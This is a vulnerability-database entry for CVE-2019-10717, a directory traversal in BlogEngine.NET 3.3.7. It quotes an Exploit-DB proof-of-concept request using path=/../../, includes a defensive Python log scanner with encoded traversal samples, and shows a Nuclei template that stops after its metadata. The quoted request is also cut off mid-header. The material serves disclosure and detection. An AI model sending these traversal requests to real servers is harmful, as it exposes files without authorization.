CVE-2019-10717
Published 2019-07-03
CVE-2019-10717: BlogEngine.NET 3.3.7.0 allows /api/filemanager Directory Traversal via the path parameter.
Priority: P3 · 50 · high
CVSS 3.0: 7.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N)
EXPLOIT
EPSS: 5.40% (91.7th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dotnetblogengine | blogengine.net | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 7.1 | HIGH | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N |
| NVD | 2.0 | 5.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:N |
No detection rules found.
Exploit-DB
BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal
exploitdb · 2019-06-25
---
# Exploit Title: Directory Traversal on BlogEngine.NET
# Date: 24 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10717
1. Description
BlogEngine.NET is vulnerable to a directory traversal. The page parameter, passed to /api/filemanager, reveals the contents of the directory.
2. Proof of Concept
Log in to the application and submit a GET request to /api/filemanager:
Request:
~~~
GET /api/filemanager?path=/../../ HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: g
~~~
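As an added example that is not part of the Exploit-DB entry or of BlogEngine.NET itself, the Python below scans constructed IIS-style log fields for /api/filemanager requests whose decoded `path` value would resolve outside the file-manager root; the same containment test is the server-side check the endpoint should apply before listing a directory. The root directory, log layout and sample lines are assumptions.

```python
# Added example (not from the advisory, the Exploit-DB entry or BlogEngine.NET):
# flag /api/filemanager requests whose decoded ``path`` parameter escapes the
# file-manager root. The same containment test is what the endpoint should
# have enforced before listing a directory.
import posixpath
from urllib.parse import parse_qs, unquote

# Constructed IIS W3C-style fields: cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
GET /api/filemanager path=/ 200
GET /api/filemanager path=/../../ 200
GET /api/filemanager path=%2F..%2F..%2FApp_Data 200
GET /api/filemanager path=/images/2019 200
GET /api/filemanager path=%252e%252e%2F 200
GET /posts/hello-world - 200
"""

FILEMANAGER_ROOT = "/App_Data/files"  # assumed root, not BlogEngine.NET's actual value


def escapes_root(requested: str, root: str = FILEMANAGER_ROOT) -> bool:
    """True when ``requested`` resolves outside ``root`` once fully decoded."""
    decoded = requested
    for _ in range(3):  # bounded re-decoding catches double-encoded %252e
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = decoded.replace("\\", "/")  # IIS treats backslash as a separator
    joined = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    return joined != root and not joined.startswith(root + "/")


def suspicious_requests(log_text: str) -> list[str]:
    """Return the ``path`` values of /api/filemanager hits that escape the root."""
    hits = []
    for line in log_text.splitlines():
        _method, stem, query, _status = line.split()
        if stem.lower() != "/api/filemanager" or query == "-":
            continue
        # parse_qs already performs one round of percent-decoding
        for value in parse_qs(query, keep_blank_values=True).get("path", []):
            if escapes_root(value):
                hits.append(value)
    return hits


if __name__ == "__main__":
    print(suspicious_requests(SAMPLE_LOG))
```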
Nuclei
BlogEngine.NET 3.3.7.0 - Local File Inclusion
nuclei · CVSS 7.1 · HIGH
BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter
Template:
~~~yaml
id: CVE-2019-10717

info:
  name: BlogEngine.NET 3.3.7.0 - Local File Inclusion
  author: arafatansari
  severity: high
  description: |
    BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter
  impact: |
    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
  remediation: |
    Upgrade to a patched version of BlogEngine.NET or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect
    - https://github.com/rxtur/BlogEngine.NET/commit
~~~
References:
- http://seclists.org/fulldisclosure/2019/Jun/44
- https://github.com/rxtur/BlogEngine.NET/commits/master
- https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect